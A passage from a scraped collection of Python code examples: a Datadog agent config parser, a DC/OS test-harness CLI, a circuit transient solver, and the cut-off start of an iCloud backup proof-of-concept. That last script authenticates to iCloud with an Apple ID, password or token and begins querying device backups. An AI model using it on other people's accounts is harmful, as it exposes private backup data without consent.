        agentConfig['api_key'] = api_keys[0]

        # Forwarder endpoints logic
        # endpoints is:
        # {
        #    'https://app.datadoghq.com': ['api_key_abc', 'api_key_def'],
        #    'https://app.example.com': ['api_key_xyz']
        # }
        endpoints = {}
        dd_urls = remove_empty(dd_urls)
        api_keys = remove_empty(api_keys)
        if len(dd_urls) == 1:
            if len(api_keys) > 0:
                endpoints[dd_urls[0]] = api_keys
        else:
            assert len(dd_urls) == len(api_keys), 'Please provide one api_key for each url'
            for i, dd_url in enumerate(dd_urls):
                endpoints[dd_url] = endpoints.get(dd_url, []) + [api_keys[i]]

        agentConfig['endpoints'] = endpoints

        # Forwarder or not forwarder
        agentConfig['use_forwarder'] = options is not None and options.use_forwarder
        if agentConfig['use_forwarder']:
            listen_port = 17123
            if config.has_option('Main', 'listen_port'):
                listen_port = int(config.get('Main', 'listen_port'))
            agentConfig['dd_url'] = "http://{}:{}".format(agentConfig['bind_host'], listen_port)
        # FIXME: Legacy dd_url command line switch
        elif options is not None and options.dd_url is not None:
            agentConfig['dd_url'] = options.dd_url

        # Forwarder timeout
        agentConfig['forwarder_timeout'] = 20
        if config.has_option('Main', 'forwarder_timeout'):
            agentConfig['forwarder_timeout'] = int(config.get('Main', 'forwarder_timeout'))


        # Extra checks.d path
        # the linux directory is set by default
        if config.has_option('Main', 'additional_checksd'):
            agentConfig['additional_checksd'] = config.get('Main', 'additional_checksd')
        elif get_os() == 'windows':
            # default windows location
            common_path = _windows_commondata_path()
            agentConfig['additional_checksd'] = os.path.join(common_path, 'Datadog', 'checks.d')

        if config.has_option('Main', 'use_dogstatsd'):
            agentConfig['use_dogstatsd'] = config.get('Main', 'use_dogstatsd').lower() in ("yes", "true")
        else:
            agentConfig['use_dogstatsd'] = True

        # Service discovery
        if config.has_option('Main', 'service_discovery_backend'):
            try:
                additional_config = extract_agent_config(config)
                agentConfig.update(additional_config)
            except:
                log.error('Failed to load the agent configuration related to '
                          'service discovery. It will not be used.')

        # Concerns only Windows
        if config.has_option('Main', 'use_web_info_page'):
            agentConfig['use_web_info_page'] = config.get('Main', 'use_web_info_page').lower() in ("yes", "true")
        else:
            agentConfig['use_web_info_page'] = True

        # local traffic only? Default to no
        agentConfig['non_local_traffic'] = False
        if config.has_option('Main', 'non_local_traffic'):
            agentConfig['non_local_traffic'] = config.get('Main', 'non_local_traffic').lower() in ("yes", "true")

        # DEPRECATED
        if config.has_option('Main', 'use_ec2_instance_id'):
            use_ec2_instance_id = config.get('Main', 'use_ec2_instance_id')
            # translate yes into True, the rest into False
            agentConfig['use_ec2_instance_id'] = (use_ec2_instance_id.lower() == 'yes')

        if config.has_option('Main', 'check_freq'):
            try:
                agentConfig['check_freq'] = int(config.get('Main', 'check_freq'))
            except Exception:
                pass

        # Custom histogram aggregate/percentile metrics
        if config.has_option('Main', 'histogram_aggregates'):
            agentConfig['histogram_aggregates'] = get_histogram_aggregates(config.get('Main', 'histogram_aggregates'))

        if config.has_option('Main', 'histogram_percentiles'):
            agentConfig['histogram_percentiles'] = get_histogram_percentiles(config.get('Main', 'histogram_percentiles'))

        # Disable Watchdog (optionally)
        if config.has_option('Main', 'watchdog'):
            if config.get('Main', 'watchdog').lower() in ('no', 'false'):
                agentConfig['watchdog'] = False

        # Optional graphite listener
        if config.has_option('Main', 'graphite_listen_port'):
            agentConfig['graphite_listen_port'] = \
                int(config.get('Main', 'graphite_listen_port'))
        else:
            agentConfig['graphite_listen_port'] = None

        # Dogstatsd config
        dogstatsd_defaults = {
            'dogstatsd_port': 8125,
            'dogstatsd_target': 'http://' + agentConfig['bind_host'] + ':17123',
        }
        for key, value in dogstatsd_defaults.iteritems():
            if config.has_option('Main', key):
                agentConfig[key] = config.get('Main', key)
            else:
                agentConfig[key] = value

        # Create app:xxx tags based on monitored apps
        agentConfig['create_dd_check_tags'] = config.has_option('Main', 'create_dd_check_tags') and \
            _is_affirmative(config.get('Main', 'create_dd_check_tags'))

        # Forwarding to external statsd server
        if config.has_option('Main', 'statsd_forward_host'):
            agentConfig['statsd_forward_host'] = config.get('Main', 'statsd_forward_host')
            if config.has_option('Main', 'statsd_forward_port'):
                agentConfig['statsd_forward_port'] = int(config.get('Main', 'statsd_forward_port'))

        # Optional config
        # FIXME not the prettiest code ever...
        if config.has_option('Main', 'use_mount'):
            agentConfig['use_mount'] = _is_affirmative(config.get('Main', 'use_mount'))

        if options is not None and options.autorestart:
            agentConfig['autorestart'] = True
        elif config.has_option('Main', 'autorestart'):
            agentConfig['autorestart'] = _is_affirmative(config.get('Main', 'autorestart'))

        if config.has_option('Main', 'check_timings'):
            agentConfig['check_timings'] = _is_affirmative(config.get('Main', 'check_timings'))

        if config.has_option('Main', 'exclude_process_args'):
            agentConfig['exclude_process_args'] = _is_affirmative(config.get('Main', 'exclude_process_args'))

        try:
            filter_device_re = config.get('Main', 'device_blacklist_re')
            agentConfig['device_blacklist_re'] = re.compile(filter_device_re)
        except ConfigParser.NoOptionError:
            pass

        # Dogstream config
        if config.has_option("Main", "dogstream_log"):
            # Older version, single log support
            log_path = config.get("Main", "dogstream_log")
            if config.has_option("Main", "dogstream_line_parser"):
                agentConfig["dogstreams"] = ':'.join([log_path, config.get("Main", "dogstream_line_parser")])
            else:
                agentConfig["dogstreams"] = log_path

        elif config.has_option("Main", "dogstreams"):
            agentConfig["dogstreams"] = config.get("Main", "dogstreams")

        if config.has_option("Main", "nagios_perf_cfg"):
            agentConfig["nagios_perf_cfg"] = config.get("Main", "nagios_perf_cfg")

        if config.has_option("Main", "use_curl_http_client"):
            agentConfig["use_curl_http_client"] = _is_affirmative(config.get("Main", "use_curl_http_client"))
        else:
            # Default to False as there are some issues with the curl client and ELB
            agentConfig["use_curl_http_client"] = False

        if config.has_section('WMI'):
            agentConfig['WMI'] = {}
            for key, value in config.items('WMI'):
                agentConfig['WMI'][key] = value

        if (config.has_option("Main", "limit_memory_consumption") and
                config.get("Main", "limit_memory_consumption") is not None):
            agentConfig["limit_memory_consumption"] = int(config.get("Main", "limit_memory_consumption"))
        else:
            agentConfig["limit_memory_consumption"] = None

        if config.has_option("Main", "skip_ssl_validation"):
            agentConfig["skip_ssl_validation"] = _is_affirmative(config.get("Main", "skip_ssl_validation"))

        agentConfig["collect_instance_metadata"] = True
        if config.has_option("Main", "collect_instance_metadata"):
            agentConfig["collect_instance_metadata"] = _is_affirmative(config.get("Main", "collect_instance_metadata"))

        agentConfig["proxy_forbid_method_switch"] = False
        if config.has_option("Main", "proxy_forbid_method_switch"):
            agentConfig["proxy_forbid_method_switch"] = _is_affirmative(config.get("Main", "proxy_forbid_method_switch"))

        agentConfig["collect_ec2_tags"] = False
        if config.has_option("Main", "collect_ec2_tags"):
            agentConfig["collect_ec2_tags"] = _is_affirmative(config.get("Main", "collect_ec2_tags"))

        agentConfig["utf8_decoding"] = False
        if config.has_option("Main", "utf8_decoding"):
            agentConfig["utf8_decoding"] = _is_affirmative(config.get("Main", "utf8_decoding"))

        agentConfig["gce_updated_hostname"] = False
        if config.has_option("Main", "gce_updated_hostname"):
            agentConfig["gce_updated_hostname"] = _is_affirmative(config.get("Main", "gce_updated_hostname"))

    except ConfigParser.NoSectionError as e:
        sys.stderr.write('Config file not found or incorrectly formatted.\n')
        sys.exit(2)

    except ConfigParser.ParsingError as e:
        sys.stderr.write('Config file not found or incorrectly formatted.\n')
        sys.exit(2)

    except ConfigParser.NoOptionError as e:
        sys.stderr.write('There are some items missing from your config file, but nothing fatal [%s]' % e)

    # Storing proxy settings in the agentConfig
    agentConfig['proxy_settings'] = get_proxy(agentConfig)
    if agentConfig.get('ca_certs', None) is None:
        agentConfig['ssl_certificate'] = get_ssl_certificate(get_os(), 'datadog-cert.pem')
    else:
        agentConfig['ssl_certificate'] = agentConfig['ca_certs']

    return agentConfig

Example 33

Project: shakedown
Source File: main.py
View license
@click.command('shakedown')
@click.argument('tests', nargs=-1)
@click.option('-u', '--dcos-url', help='URL to a running DC/OS cluster.')
@click.option('-f', '--fail', type=click.Choice(['fast', 'never']), default='never', help='Sepcify whether to continue testing when encountering failures. (default: never)')
@click.option('-i', '--ssh-key-file', type=click.Path(), help='Path to the SSH keyfile to use for authentication.')
@click.option('-q', '--quiet', is_flag=True, help='Suppress all superfluous output.')
@click.option('-k', '--ssl-no-verify', is_flag=True, help='Suppress SSL certificate verification.')
@click.option('-o', '--stdout', type=click.Choice(['pass', 'fail', 'skip', 'all', 'none']), help='Print the standard output of tests with the specified result. (default: fail)')
@click.option('-s', '--stdout-inline', is_flag=True, help='Display output inline rather than after test phase completion.')
@click.option('-p', '--pytest-option', multiple=True, help='Options flags to pass to pytest.')
@click.option('-t', '--oauth-token', help='OAuth token to use for DC/OS authentication.')
@click.option('-n', '--username', help='Username to use for DC/OS authentication.')
@click.option('-w', '--password', hide_input=True, help='Password to use for DC/OS authentication.')
@click.option('--no-banner', is_flag=True, help='Suppress the product banner.')
@click.version_option(version=shakedown.VERSION)


def cli(**args):
    """ Shakedown is a DC/OS test-harness wrapper for the pytest tool.
    """
    import shakedown

    # Read configuration options from ~/.shakedown (if exists)
    args = read_config(args)

    # Set configuration defaults
    args = set_config_defaults(args)

    if args['quiet']:
        shakedown.cli.quiet = True

    if not args['dcos_url']:
        args['dcos_url'] = dcos_url()

    if not args['dcos_url']:
        click.secho('error: --dcos-url is a required option; see --help for more information.', fg='red', bold=True)
        sys.exit(1)

    if args['ssh_key_file']:
        shakedown.cli.ssh_key_file = args['ssh_key_file']

    if not args['no_banner']:
        echo(banner(), n=False)

    echo('Running pre-flight checks...', d='step-maj')

    # required modules and their 'version' method
    imported = {}
    requirements = {
        'pytest': '__version__',
        'dcos': 'version'
    }

    for req in requirements:
        ver = requirements[req]

        echo("Checking for {} library...".format(req), d='step-min', n=False)
        try:
            imported[req] = importlib.import_module(req, package=None)
        except ImportError:
            click.secho("error: {p} is not installed; run 'pip install {p}'.".format(p=req), fg='red', bold=True)
            sys.exit(1)

        echo(getattr(imported[req], requirements[req]))

    if args['ssl_no_verify']:
        imported['dcos'].config.set_val('core.ssl_verify', 'False')

    echo('Checking for DC/OS cluster...', d='step-min', n=False)

    with stdchannel_redirected(sys.stderr, os.devnull):
        imported['dcos'].config.set_val('core.dcos_url', args['dcos_url'])

    try:
        echo(shakedown.dcos_version())
    except:
        click.secho("error: cluster '" + args['dcos_url'] + "' is unreachable.", fg='red', bold=True)
        sys.exit(1)

    echo('Authenticating with cluster...', d='step-maj')
    authenticated = False
    token = imported['dcos'].config.get_config_val("core.dcos_acs_token")
    if token is not None:
        echo('Validating existing ACS token...', d='step-min', n=False)
        try:
            shakedown.dcos_leader()

            echo('ok')
            authenticated = True
        except imported['dcos'].errors.DCOSException:
            click.secho("error: authentication failed.", fg='red', bold=True)
    if not authenticated and args['oauth_token']:
       try:
            echo('Validating OAuth token...', d='step-min', n=False)
            token = shakedown.authenticate_oauth(args['oauth_token'])

            with stdchannel_redirected(sys.stderr, os.devnull):
                imported['dcos'].config.set_val('core.dcos_acs_token', token)

            authenticated = True
            echo('ok')
       except:
            click.secho("error: authentication failed.", fg='red', bold=True)
    if not authenticated and args['username'] and args['password']:
        try:
            echo('Validating username and password...', d='step-min', n=False)
            token = shakedown.authenticate(args['username'], args['password'])

            with stdchannel_redirected(sys.stderr, os.devnull):
                imported['dcos'].config.set_val('core.dcos_acs_token', token)

            authenticated = True
            echo('ok')
        except:
            click.secho("error: authentication failed.", fg='red', bold=True)
    if not authenticated:
        click.secho("error: no authentication credentials or token found.", fg='red', bold=True)
        sys.exit(1)

    class shakedown:
        """ This encapsulates a PyTest wrapper plugin
        """

        state = {}

        stdout = []

        tests = {
            'file': {},
            'test': {}
        }

        report_stats = {
            'passed':[],
            'skipped':[],
            'failed':[],
            'total_passed':0,
            'total_skipped':0,
            'total_failed':0,
        }


        def output(title, state, text, status=True):
            """ Capture and display stdout/stderr output

                :param title: the title of the output box (eg. test name)
                :type title: str
                :param state: state of the result (pass, fail)
                :type state: str
                :param text: the stdout/stderr output
                :type text: str
                :param status: whether to output a status marker
                :type status: bool
            """
            if state == 'fail':
                schr = fchr('FF')
            elif state == 'pass':
                schr = fchr('PP')

            if status:
                if not args['stdout_inline']:
                    if state == 'fail':
                        echo(schr, d='fail')
                    elif state == 'pass':
                        echo(schr, d='pass')
                else:
                    if not text:
                        if state == 'fail':
                            echo(schr, d='fail')
                        elif state == 'pass':
                            echo(schr, d='pass')

            if text and args['stdout'] in [state, 'all']:
                o = decorate(schr + ': ', 'quote-head-' + state)
                o += click.style(decorate(title, style=state), bold=True) + "\n"
                o += decorate(str(text).strip(), style='quote-' + state)

                if args['stdout_inline']:
                    echo(o)
                else:
                    shakedown.stdout.append(o)


        def pytest_collectreport(self, report):
            """ Collect and validate individual test files
            """

            if not 'collect' in shakedown.state:
                shakedown.state['collect'] = 1
                echo('Collecting and validating test files...', d='step-min')

            if report.nodeid:
                echo(report.nodeid, d='item-maj', n=False)

                state = None

                if report.failed:
                    state = 'fail'
                if report.passed:
                    state = 'pass'
                if report.skipped:
                    state = 'skip'

                if state:
                    if report.longrepr:
                        shakedown.output(report.nodeid, state, report.longrepr)
                    else:
                        shakedown.output(report.nodeid, state, None)


        def pytest_sessionstart(self):
            """ Tests have been collected, begin running them...
            """

            echo('Initiating testing phase...', d='step-maj')


        def pytest_report_teststatus(self, report):
            """ Print report results to the console as they are run
            """

            try:
                report_file, report_test = report.nodeid.split('::', 1)
            except ValueError:
                return

            if not 'test' in shakedown.state:
                shakedown.state['test'] = 1
                echo('Running individual tests...', d='step-min')

            if not report_file in shakedown.tests['file']:
                shakedown.tests['file'][report_file] = 1
                if args['stdout_inline']:
                    echo('')
                echo(report_file, d='item-maj')
            if not report.nodeid in shakedown.tests['test']:
                shakedown.tests['test'][report.nodeid] = {}
                if args['stdout_inline']:
                    echo('')
                echo(report_test, d='item-min', n=False)

            if report.failed:
                shakedown.tests['test'][report.nodeid]['fail'] = True

            if report.when == 'teardown' and not 'tested' in shakedown.tests['test'][report.nodeid]:
                shakedown.output(report.nodeid, 'pass', None)

            # Suppress excess terminal output
            return report.outcome, None, None


        def pytest_runtest_logreport(self, report):
            """ Log the [stdout, stderr] results of tests if desired
            """

            state = None

            for secname, content in report.sections:
                if report.failed:
                    state = 'fail'
                if report.passed:
                    state = 'pass'
                if report.skipped:
                    state = 'skip'

                if state and secname != 'Captured stdout call':
                    module = report.nodeid.split('::', 1)[0]
                    cap_type = secname.split(' ')[-1]

                    if not 'setup' in shakedown.tests['test'][report.nodeid]:
                        shakedown.tests['test'][report.nodeid]['setup'] = True
                        shakedown.output(module + ' ' + cap_type, state, content, False)
                    elif cap_type == 'teardown':
                        shakedown.output(module + ' ' + cap_type, state, content, False)
                elif state and report.when == 'call':
                    if 'tested' in shakedown.tests['test'][report.nodeid]:
                        shakedown.output(report.nodeid, state, content, False)
                    else:
                        shakedown.tests['test'][report.nodeid]['tested'] = True
                        shakedown.output(report.nodeid, state, content)

            # Capture execution crashes
            if hasattr(report.longrepr, 'reprcrash'):
                longreport = report.longrepr

                if 'tested' in shakedown.tests['test'][report.nodeid]:
                    shakedown.output(report.nodeid, 'fail', 'error: ' + str(longreport.reprcrash), False)

                    if args['stdout_inline']:
                        echo('')
                else:
                    shakedown.tests['test'][report.nodeid]['tested'] = True
                    shakedown.output(report.nodeid, 'fail', 'error: ' + str(longreport.reprcrash))


        def pytest_sessionfinish(self, session, exitstatus):
            """ Testing phase is complete; print extra reports (stdout/stderr, JSON) as requested
            """

            echo('Test phase completed.', d='step-maj')

            if ('stdout' in args and args['stdout']) and shakedown.stdout:
                for output in shakedown.stdout:
                    echo(output)

    opts = ['-q', '--tb=no']

    if args['fail'] == 'fast':
        opts.append('-x')

    if args['pytest_option']:
        for opt in args['pytest_option']:
            opts.append(opt)

    if args['tests']:
        tests_to_run = []
        for test in args['tests']:
            tests_to_run.extend(test.split())
        for test in tests_to_run:
            opts.append(test)

    exitstatus = imported['pytest'].main(opts, plugins=[shakedown()])

    sys.exit(exitstatus)

Example 34

Project: ahkab
Source File: transient.py
View license
def transient_analysis(circ, tstart, tstep, tstop, method=options.default_tran_method, use_step_control=True, x0=None,
                       mna=None, N=None, D=None, outfile="stdout", return_req_dict=None, verbose=3):
    """Performs a transient analysis of the circuit described by circ.

    Parameters:
    circ: circuit instance to be simulated.
    tstart: start value. Better leave this to zero.
    tstep: the maximum step to be allowed during simulation or
    tstop: stop value for simulation
    method: differentiation method: 'TRAP' (default) or 'IMPLICIT_EULER' or 'GEARx' with x=1..6
    use_step_control: the LTE will be calculated and the step adjusted. default: True
    x0: the starting point, the solution at t=tstart (defaults to None, will be set to the OP)
    mna, N, D: MNA matrices, defaulting to None, for big circuits, reusing matrices saves time
    outfile: filename, the results will be written to this file. "stdout" means print out.
    return_req_dict:  to be documented
    verbose: verbosity level from 0 (silent) to 6 (very verbose).

    """
    if outfile == "stdout":
        verbose = 0
    _debug = False
    if options.transient_no_step_control:
        use_step_control = False
    if _debug:
        print_step_and_lte = True
    else:
        print_step_and_lte = False

    method = method.upper() if method is not None else options.default_tran_method
    HMAX = tstep

    #check parameters
    if tstart > tstop:
        printing.print_general_error("tstart > tstop")
        sys.exit(1)
    if tstep < 0:
        printing.print_general_error("tstep < 0")
        sys.exit(1)

    if verbose > 4:
        tmpstr = "Vea = %g Ver = %g Iea = %g Ier = %g max_time_iter = %g HMIN = %g" % \
        (options.vea, options.ver, options.iea, options.ier, options.transient_max_time_iter, options.hmin)
        printing.print_info_line((tmpstr, 5), verbose)

    locked_nodes = circ.get_locked_nodes()

    if print_step_and_lte:
        flte = open("step_and_lte.graph", "w")
        flte.write("#T\tStep\tLTE\n")

    printing.print_info_line(("Starting transient analysis: ", 3), verbose)
    printing.print_info_line(("Selected method: %s" % (method,), 3), verbose)
    #It's a good idea to call transient with prebuilt MNA and N matrix
    #the analysis will be slightly faster (long netlists).
    if mna is None or N is None:
        (mna, N) = dc_analysis.generate_mna_and_N(circ, verbose=verbose)
        mna = utilities.remove_row_and_col(mna)
        N = utilities.remove_row(N, rrow=0)
    elif not mna.shape[0] == N.shape[0]:
        printing.print_general_error("mna matrix and N vector have different number of columns.")
        sys.exit(0)
    if D is None:
        # if you do more than one tran analysis, output streams should be changed...
        # this needs to be fixed
        D = generate_D(circ, (mna.shape[0], mna.shape[0]))
        D = utilities.remove_row_and_col(D)

    # setup x0
    if x0 is None:
        printing.print_info_line(("Generating x(t=%g) = 0" % (tstart,), 5), verbose)
        x0 = np.zeros((mna.shape[0], 1))
        opsol =  results.op_solution(x=x0, error=x0, circ=circ, outfile=None)
    else:
        if isinstance(x0, results.op_solution):
            opsol = x0
            x0 = x0.asarray()
        else:
            opsol =  results.op_solution(x=x0, error=np.zeros((mna.shape[0], 1)), circ=circ, outfile=None)
        printing.print_info_line(("Using the supplied op as x(t=%g)." % (tstart,), 5), verbose)

    if verbose > 4:
        print("x0:")
        opsol.print_short()

    # setup the df method
    printing.print_info_line(("Selecting the appropriate DF ("+method+")... ", 5), verbose, print_nl=False)
    if method == IMPLICIT_EULER:
        from . import implicit_euler as df
    elif method == TRAP:
        from . import trap as df
    elif method == GEAR1:
        from . import gear as df
        df.order = 1
    elif method == GEAR2:
        from . import gear as df
        df.order = 2
    elif method == GEAR3:
        from . import gear as df
        df.order = 3
    elif method == GEAR4:
        from . import gear as df
        df.order = 4
    elif method == GEAR5:
        from . import gear as df
        df.order = 5
    elif method == GEAR6:
        from . import gear as df
        df.order = 6
    else:
        df = import_custom_df_module(method, print_out=(outfile != "stdout"))
        # df is none if module is not found

    if df is None:
        sys.exit(23)

    if not df.has_ff() and use_step_control:
        printing.print_warning("The chosen DF does not support step control. Turning off the feature.")
        use_step_control = False
        #use_aposteriori_step_control = False

    printing.print_info_line(("done.", 5), verbose)

    # setup the data buffer
    # if you use the step control, the buffer has to be one point longer.
    # That's because the excess point is used by a FF in the df module to predict the next value.
    printing.print_info_line(("Setting up the buffer... ", 5), verbose, print_nl=False)
    ((max_x, max_dx), (pmax_x, pmax_dx)) = df.get_required_values()
    if max_x is None and max_dx is None:
        printing.print_general_error("df doesn't need any value?")
        sys.exit(1)
    if use_step_control:
        buffer_len = 0
        for mx in (max_x, max_dx, pmax_x, pmax_dx):
            if mx is not None:
                buffer_len = max(buffer_len, mx)
        buffer_len += 1
        thebuffer = dfbuffer(length=buffer_len, width=3)
    else:
        thebuffer = dfbuffer(length=max(max_x, max_dx) + 1, width=3)
    thebuffer.add((tstart, x0, None)) #setup the first values
    printing.print_info_line(("done.", 5), verbose) #FIXME

    #setup the output buffer
    if return_req_dict:
        output_buffer = dfbuffer(length=return_req_dict["points"], width=1)
        output_buffer.add((x0,))
    else:
        output_buffer = None

    # import implicit_euler to be used in the first iterations
    # this is because we don't have any dx when we start, nor any past point value
    if (max_x is not None and max_x > 0) or max_dx is not None:
        from . import implicit_euler
        first_iterations_number = max_x if max_x is not None else 1
        first_iterations_number = max( first_iterations_number, max_dx+1) \
                                  if max_dx is not None else first_iterations_number
    else:
        first_iterations_number = 0

    printing.print_info_line(("MNA (reduced):", 5), verbose)
    printing.print_info_line((mna, 5), verbose)
    printing.print_info_line(("D (reduced):", 5), verbose)
    printing.print_info_line((D, 5), verbose)

    # setup the initial values to start the iteration:
    x = None
    time = tstart
    nv = circ.get_nodes_number()

    Gmin_matrix = dc_analysis.build_gmin_matrix(circ, options.gmin, mna.shape[0], verbose)

    # lo step viene generato automaticamente, ma non superare mai quello fornito.
    if use_step_control:
        #tstep = min((tstop-tstart)/9999.0, HMAX, 100.0 * options.hmin)
        tstep = min((tstop-tstart)/9999.0, HMAX)
    printing.print_info_line(("Initial step: %g"% (tstep,), 5), verbose)

    if max_dx is None:
        max_dx_plus_1 = None
    else:
        max_dx_plus_1 = max_dx +1
    if pmax_dx is None:
        pmax_dx_plus_1 = None
    else:
        pmax_dx_plus_1 = pmax_dx +1

    # setup error vectors
    aerror = np.zeros((x0.shape[0], 1))
    aerror[:nv-1, 0] = options.vea
    aerror[nv-1:, 0] = options.vea
    rerror = np.zeros((x0.shape[0], 1))
    rerror[:nv-1, 0] = options.ver
    rerror[nv-1:, 0] = options.ier

    iter_n = 0  # contatore d'iterazione
    # when to start predicting the next point
    start_pred_iter = max(*[i for i in (0, pmax_x, pmax_dx_plus_1) if i is not None])
    lte = None
    sol = results.tran_solution(circ, tstart, tstop, op=x0, method=method, outfile=outfile)
    printing.print_info_line(("Solving... ", 3), verbose, print_nl=False)
    tick = ticker.ticker(increments_for_step=1)
    tick.display(verbose > 1)
    while time < tstop:
        if iter_n < first_iterations_number:
            x_coeff, const, x_lte_coeff, prediction, pred_lte_coeff = \
            implicit_euler.get_df((thebuffer.get_df_vector()[0],), tstep, \
            predict=(use_step_control and iter_n >= start_pred_iter))
        else:
            x_coeff, const, x_lte_coeff, prediction, pred_lte_coeff = \
                df.get_df(thebuffer.get_df_vector(), tstep,
                          predict=(use_step_control and
                                   iter_n >= start_pred_iter)
                         )

        if options.transient_prediction_as_x0 and use_step_control and prediction is not None:
            x0 = prediction
        elif x is not None:
            x0 = x

        x1, error, solved, n_iter = dc_analysis.dc_solve(
                                                     mna=(mna + np.multiply(x_coeff, D)),
                                                     Ndc=N,  Ntran=np.dot(D, const), circ=circ,
                                                     Gmin=Gmin_matrix, x0=x0,
                                                     time=(time + tstep),
                                                     locked_nodes=locked_nodes,
                                                     MAXIT=options.transient_max_nr_iter,
                                                     verbose=0
                                                     )

        if solved:
            old_step = tstep #we will modify it, if we're using step control otherwise it's the same
            # step control (yeah)
            if use_step_control:
                if x_lte_coeff is not None and pred_lte_coeff is not None and prediction is not None:
                    # this is the Local Truncation Error :)
                    lte = abs((x_lte_coeff / (pred_lte_coeff - x_lte_coeff)) * (prediction - x1))
                    # it should NEVER happen that new_step > 2*tstep, for stability
                    new_step_coeff = 2
                    for index in range(x.shape[0]):
                        if lte[index, 0] != 0:
                            new_value = ((aerror[index, 0] + rerror[index, 0]*abs(x[index, 0])) / lte[index, 0]) \
                            ** (1.0 / (df.order+1))
                            if new_value < new_step_coeff:
                                new_step_coeff = new_value
                            #print new_value
                    new_step = tstep * new_step_coeff
                    if (options.transient_use_aposteriori_step_control and
                        new_step_coeff <
                        options.transient_aposteriori_step_threshold):
                        #don't recalculate a x for a small change
                        tstep = check_step(new_step, time, tstop, HMAX)
                        #print "Apost. (reducing) step = "+str(tstep)
                        continue
                    tstep = check_step(new_step, time, tstop, HMAX) # used in the next iteration
                    #print "Apriori tstep = "+str(tstep)
                else:
                    #print "LTE not calculated."
                    lte = None
            if print_step_and_lte and lte is not None:
                #if you wish to look at the step. We print just a lte
                flte.write(str(time)+"\t"+str(old_step)+"\t"+str(lte.max())+"\n")
            # if we get here, either aposteriori_step_control is
            # disabled, or it's enabled and the error is small
            # enough. Anyway, the result is GOOD, STORE IT.
            time = time + old_step
            x = x1
            iter_n = iter_n + 1
            sol.add_line(time, x)

            dxdt = np.multiply(x_coeff, x) + const
            thebuffer.add((time, x, dxdt))
            if output_buffer is not None:
                output_buffer.add((x, ))
            tick.step()
        else:
            # If we get here, Newton failed to converge. We need to reduce the step...
            if use_step_control:
                tstep = tstep/5.0
                tstep = check_step(tstep, time, tstop, HMAX)
                printing.print_info_line(("At %g s reducing step: %g s (convergence failed)" % (time, tstep), 5), verbose)
            else: #we can't reduce the step
                printing.print_general_error("Can't converge with step "+str(tstep)+".")
                printing.print_general_error("Try setting --t-max-nr to a higher value or set step to a lower one.")
                solved = False
                break
        if options.transient_max_time_iter and iter_n == options.transient_max_time_iter:
            printing.print_general_error("MAX_TIME_ITER exceeded ("+str(options.transient_max_time_iter)+"), iteration halted.")
            solved = False
            break

    if print_step_and_lte:
        flte.close()

    tick.hide(verbose > 1)

    if solved:
        printing.print_info_line(("done.", 3), verbose)
        printing.print_info_line(("Average time step: %g" % ((tstop - tstart)/iter_n,), 3), verbose)

        if output_buffer:
            ret_value = output_buffer.get_as_matrix()
        else:
            ret_value = sol
    else:
        print("failed.")
        ret_value =  None

    return ret_value

Example 35

Project: iOS9_iCloud_POC
Source File: iOS9_iCloud_POC.py
View license
def main():
    # TODO can we retrieve these?
    global device_ID
    global device_name
    device_ID = random_bytes(32)
    device_name = 'My iPhone'

    # Parse arguments
    arguments = docopt(__doc__, version='iOS9_iCloud_POC 1.0')

    apple_id = arguments['<appleid>']
    apple_pw = arguments['<password>']
    if arguments['<token>']:
        dsPrsID, mmeAuthToken = arguments['<token>'].split(':')
        SKIP_AUTH = True
    else:
        SKIP_AUTH = False

    device_index = int(arguments['--device'] or 0)
    snapshot_index = int(arguments['--snapshot'] or 0)
    manifest_index = int(arguments['--manifest'] or 0)


    ####################################################################################################################
    # Step 1: Authenticaton
    ####################################################################################################################
    if not SKIP_AUTH:
        debug('Step 1: Authenticaton')

        auth = 'Basic %s' % base64.b64encode('%s:%s' % (apple_id, apple_pw))
        authenticateResponse = plist_request('setup.icloud.com', 'POST', '/setup/authenticate/$APPLE_ID$', '',
                                                             {'Authorization': auth,
                                                              'Connection': 'Keep-Alive'})
        if not authenticateResponse:
            debug('Invalid Apple ID/password?')
            sys.exit(1)
        pprint(authenticateResponse)

        dsPrsID = str(authenticateResponse['appleAccountInfo']['dsPrsID'])
        mmeAuthToken = authenticateResponse['tokens']['mmeAuthToken']
        if arguments['--token']:
            print '\nToken: %s:%s' % (dsPrsID, mmeAuthToken)
            sys.exit(1)

        # Cookies don't seem to be required
        #cookie = result_headers['set-cookie'].split(';')[0]

    else:
        debug('Skipping Step 1 (Authentication)')

    # noinspection PyUnboundLocalVariable
    auth = 'Basic %s' % base64.b64encode('%s:%s' % (dsPrsID, mmeAuthToken))


    ####################################################################################################################
    # STEP 2. Account settings.
    ####################################################################################################################
    debug('\nSTEP 2. Account settings.')
    if not SKIP_AUTH:
        account_settings = plist_request('setup.icloud.com', 'POST', '/setup/get_account_settings', '',
                                                            {'Authorization': auth,
                                                             'X-MMe-Client-Info': Client_Info,
                                                             'User-Agent': USER_AGENT_UBD
                                                             # 'Cookie': cookie
                                                             })
    else:
        account_settings = plist_request('setup.icloud.com', 'POST', '/setup/get_account_settings', '',
                                                            {'Authorization': auth,
                                                             'X-MMe-Client-Info': Client_Info,
                                                             'User-Agent': USER_AGENT_UBD})

    pprint(account_settings)
    cloud_kit_token = account_settings['tokens']['cloudKitToken']
    # if SKIP_AUTH:
    #     cookie = result_headers['set-cookie'].split(';')[0]


    ####################################################################################################################
    # STEP 3. CloudKit Application Initialization.
    ####################################################################################################################
    debug('\nSTEP 3. CloudKit Application Initialization.')
    # Note, we aren't passing all the headers that Inflatable does or even that the real iphone does
    # But our response seem to be the same
    cloudkit_init = json_request('setup.icloud.com', 'POST', '/setup/ck/v1/ckAppInit?container=com.apple.backup.ios', '',
                                    {'Authorization': auth,
                                     'X-MMe-Client-Info': Client_Info,
                                     'X-CloudKit-AuthToken': cloud_kit_token,
                                     'X-CloudKit-ContainerId': 'com.apple.backup.ios',
                                     'X-CloudKit-BundleId': 'com.apple.backupd',
                                     'X-CloudKit-Environment': 'production',
                                     'X-CloudKit-Partition': 'production',
                                     'User-Agent': USER_AGENT_UBD
                                     # 'Cookie': cookie
                                     })

    pprint(cloudkit_init)

    ckdatabase_host = urlparse(cloudkit_init['cloudKitDatabaseUrl']).hostname
    cloudkit_user_id = cloudkit_init['cloudKitUserId']


    ####################################################################################################################
    # STEP 4. Record zones.
    #Returns record zone data which needs further analysis.
    ####################################################################################################################
    debug('\nSTEP 4. Record zones.')

    requestOperation = retrieve_request(201)
    # zoneRetrieveRequest
    zrr = requestOperation.zoneRetrieveRequest
    zrr.zoneIdentifier.value.name = 'mbksync'
    zrr.zoneIdentifier.value.type = 6
